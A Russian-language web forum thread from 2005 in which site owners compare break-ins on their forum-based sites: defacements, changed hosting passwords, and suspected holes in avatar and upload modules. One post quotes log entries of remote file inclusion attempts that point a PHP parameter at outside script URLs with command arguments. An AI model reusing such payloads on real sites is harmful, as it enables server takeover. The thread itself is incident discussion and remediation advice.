Ну вот и мой сайт отломали...

[DimonVideo]

Цитата:

Сообщение от LARK Это уже после взлома?

нет, они сначала пару раз его в обменник грузили, хотя запрет на php стоял , а потом как т отуда умудрились и через него все стерли на серваке

[Zormax]

Несколько дней подряд нахожу в логах такого рода ошибки (привожу выборочно сегодняшние):

***forumpollrenderer.php?bbPath[path]=http://lol.freecoolsite.com/veg.txt?&cmd=id

***forumpollrenderer.php?bbPath[path]=http://darkboyz.mvhosted.com/cmd.txt?&cmd=help

* - это поскипано.

Кстати, айпишник всегда один и тот же...

Прикрепляю даже файлы этих скриптов...

[LARK]

Цитата:

Несколько дней подряд нахожу в логах такого рода ошибки (привожу выборочно сегодняшние):

А, это как раз пытаются закачать эксплоит через дырку в форуме о которой говорили. Ни у понятно получить Shell доступ

[Zormax]

Это все понятно, вот и сиди и трясись...

[lutsiger]

Мой сайт ломали вчера и поставили index.html свой . Установил заплатку на форум, только что опять ломали и обломались!!!!

[clog]

Меня вчера тоже ломали. Помоему через загрузку аватров.

Каким то образом исчезли аватры у польщователей не которых, но на серваке они есть.

[Jurist]

Были ломатели и у меня... час назад. Подмена главной, хотя заплатки стоят и для форума и для аватаров... Заменили главную на index.html, заменили пароль доступа к с-панели на хостинге, пароль к БД и админ-почте, соответственно для админского ftp сменился... Хорошо что быстро обнаружил, тут же позвонил хостеру, главную-html убрали... сменили пароли, сайт пока снова работает... вот только не успел сохранить адреса и инфу, которую эти гады оставляли на главной...

Вопрос: если установлены патчи на форум + патч для загрузки файлов - каким еще способом могли зайти и получить доступ? Логи доступа щас скачаю конечно ид с-панели, но пока докопаюсь что где и как....

[Zormax]

Jurist Модуль upload это переделанный mydownloads???
Может через него или через mylinks...

Посмотри в файлах visit, singlefile, modfile, ratefile, brokenfile есть такие строки:

$lid = intval($HTTP_GET_VARS['lid']);
$cid = intval($HTTP_POST_VARS["cid"]);

Что-то подобное есть?

[Jurist]

Второй строки нет, первая прослеживается в файлах brokenfile (строка 43) и modfile (срока 96) модуля upload. Да, он сделан на основе mydownloads, брал модуль из обменника на форуме.. И что это за строки?

[Jurist]

И еще... в логе сервера за сегодня первые упоминания о файле index.html "звучат" в строках:

213.255.202.62 - - [23/Nov/2005:13:27:10 +0200] "GET /index.html HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [ru]"
213.255.202.62 - - [23/Nov/2005:13:27:19 +0200] "GET /index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [ru]"

Если что-то еще можно накопать в этом логе с сервака (raw-log) то он у меня есть, хостер сделал вырезку с 00 часов где-то по 15:15 дня... Факт вставки первой страницы был обнаружен как раз около часа дня... хотя... чуть раньше, где-то в полдвенадцатого заметил, что не снимается админ-почта, выдает ошибку пароля.